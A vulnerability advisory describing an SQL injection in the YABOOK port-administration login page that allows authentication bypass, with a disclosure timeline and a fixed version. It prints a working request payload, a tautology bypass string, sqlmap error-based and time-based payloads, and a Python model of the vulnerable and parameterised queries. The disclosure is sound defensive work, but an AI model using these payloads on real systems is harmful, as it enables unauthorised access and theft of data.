SQL injection in YABOOK port administration allows authentication bypass

YABOOK is a web-based software by News-Solutions for managing wharves in ports. Hosting of the solution is usually done via a service provider, or it is self-hosted by the ports. During a security investigation, Pentagrid discovered an SQL injection in the login mask of the web application, which enabled authentication bypass. This security issue has been resolved.

Timeline

  • 2023-12-13: Initial contact with the manufacturer and initial advisory sent.

  • 2023-12-13: Verified fix is present in version 6.61.

  • 2024-02-13: CVE-ID requested.

  • 2024-03-12: Deadline for publication after 90 days.

1. SQL injection in the port administration software YABOOK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, 9.8 Critical

Affected Components

Pentagrid identified the vulnerability in the following versions of YABOOK in the on-prem version during a penetration test. Other versions are possibly affected as well.

  • Version 3.43

  • Version 5.80

Summary

The YABOOK web application has an SQL injection vulnerability on the login page that can be exploited by unauthenticated persons in the network or via the Internet.

Impact

Authentication can be bypassed. The administrator account can be taken over. The application can be completely compromised with SQL injections. All application data can be read and manipulated. Reading out and determining passwords can also affect other applications if passwords are reused.

Technical Details

Both tested versions are affected by an SQL injection in the username field when processing login data. An error message occurs when an odd number of quotation marks is entered, as the following example request shows:

POST /kasse/ HTTP/1.1
Host: XX.XX.XX.XX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Origin: http://XX.XX.XX.XX
DNT: 1
Connection: close
Referer: http://XX.XX.XX.XX/kasse/
Cookie: Kasse=fnba5lhg04ib7e6v3qqk81gu05
Upgrade-Insecure-Requests: 1

username=administrator%27%29+OR+1%3D1&password=asd&submit=Login

This HTTP request results in the following HTTP response:

HTTP/1.1 200 OK
Date: [...]
Server: [...]
X-Powered-By: [...]
Expires: [...]
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4613
Connection: close
Content-Type: text/html

 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
     "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hafenverwaltung - YABOOK</title>

[...]

</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND (password='7815696ecbf1c96e6894b779456d330e')' at line 1<div class=error>Benutzername oder Passwort falsch!</div>

Web applications often use an SQL query to validate a login. The query asks the database for entries matching the provided login data. If the number of returned rows is greater than zero, access is granted. Such queries can be exploited if the site is affected by an SQL injection vulnerability: by manipulating the query, an attacker can make the result always greater than zero, regardless of the entered password. This is also the case with YABOOK. If the character string admin'' OR ('1'='1 is entered as the user name, together with any password, the user is automatically logged in as an administrator.
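As an added illustration (not code from the advisory or from YABOOK), the following Python models the login check whose shape the leaked MySQL error reveals, `(username='...') AND (password='<md5>')`, on an in-memory SQLite table with a hypothetical name and layout, and places the concatenated query beside a parameterised one. The unsalted MD5 comparison is taken from the advisory's sqlmap findings; the table, column and account names are assumptions.

```python
import hashlib
import sqlite3


def md5_hex(password):
    """Unsalted MD5 of the password, as the application stores it."""
    return hashlib.md5(password.encode()).hexdigest()


def make_db(admin_password="constructed-admin-pw"):
    """Constructed stand-in for the YABOOK backend (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("administrator", md5_hex(admin_password)))
    return db


def build_vulnerable_sql(username, password):
    """Builds the login query the way the leaked error message implies:
    raw form input is pasted straight into the WHERE clause."""
    return ("SELECT COUNT(*) FROM users WHERE (username='%s') AND (password='%s')"
            % (username, md5_hex(password)))


def login_vulnerable(db, username, password):
    """Runs the concatenated query. Returns (granted, leaked_error): the real
    application echoed the database's syntax error into the login page, which
    is what leaked_error stands for; a generic message should be shown instead."""
    try:
        granted = db.execute(build_vulnerable_sql(username, password)).fetchone()[0] > 0
        return granted, None
    except sqlite3.Error as exc:
        return False, str(exc)


def login_parameterized(db, username, password):
    """Hardened form: bound parameters keep user input out of the SQL text,
    so quotes and parentheses in the username are treated as plain data."""
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE (username=?) AND (password=?)",
        (username, md5_hex(password))).fetchone()
    return row[0] > 0
```

With the advisory's first payload the concatenated statement fails to parse (the leaked error case), while a tautology in the username logs in without the password; the parameterised variant treats the same input as a literal user name that does not exist.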

The vulnerability was also detectable using Sqlmap and the database backend was identified, as the following excerpt shows:

[13:32:53] [INFO] resuming back-end DBMS 'mysql'
[13:32:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: username=administrator') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170767671,(SELECT (ELT(2508=2508,1))),0x716b6b7071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xddc&password=&submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=administrator') AND (SELECT 5783 FROM (SELECT(SLEEP(5)))dTQF)-- jOzA&password=&submit=Login
---
[13:32:53] [INFO] the back-end DBMS is MySQL
[13:32:53] [INFO] fetching banner
[13:32:53] [INFO] resumed: [...]
web server operating system: Linux Debian [...]
web application technology: [...]
back-end DBMS: MySQL >= 5.5
banner: [...]

Using Sqlmap, it was also possible to read password hashes of user accounts. These are MD5 hashes of the passwords without any further salt value, which simplifies a brute force attack on the hashes. MD5 is fast to compute, so candidate passwords can be hashed and tried at a high rate, which is why it is considered unsafe to hash passwords using this algorithm.

Precondition

An attacker needs access to the network and must be able to reach the web application on the network. This is not necessary if the application is also accessible from the Internet, which is the case for some ports in Germany.

Recommendation

Recommendation for the vendor:

  • The vulnerability should be addressed and further security analysis conducted.

  • Send a generic error message instead of error messages for incorrect SQL syntax.

  • Inform affected customers.

Recommendation for users:

  • Switch to a current version of the software. According to Pentagrid tests, version 6.61 is free of the problem.

Credits

This vulnerability has been found by Ole Diederich (Pentagrid).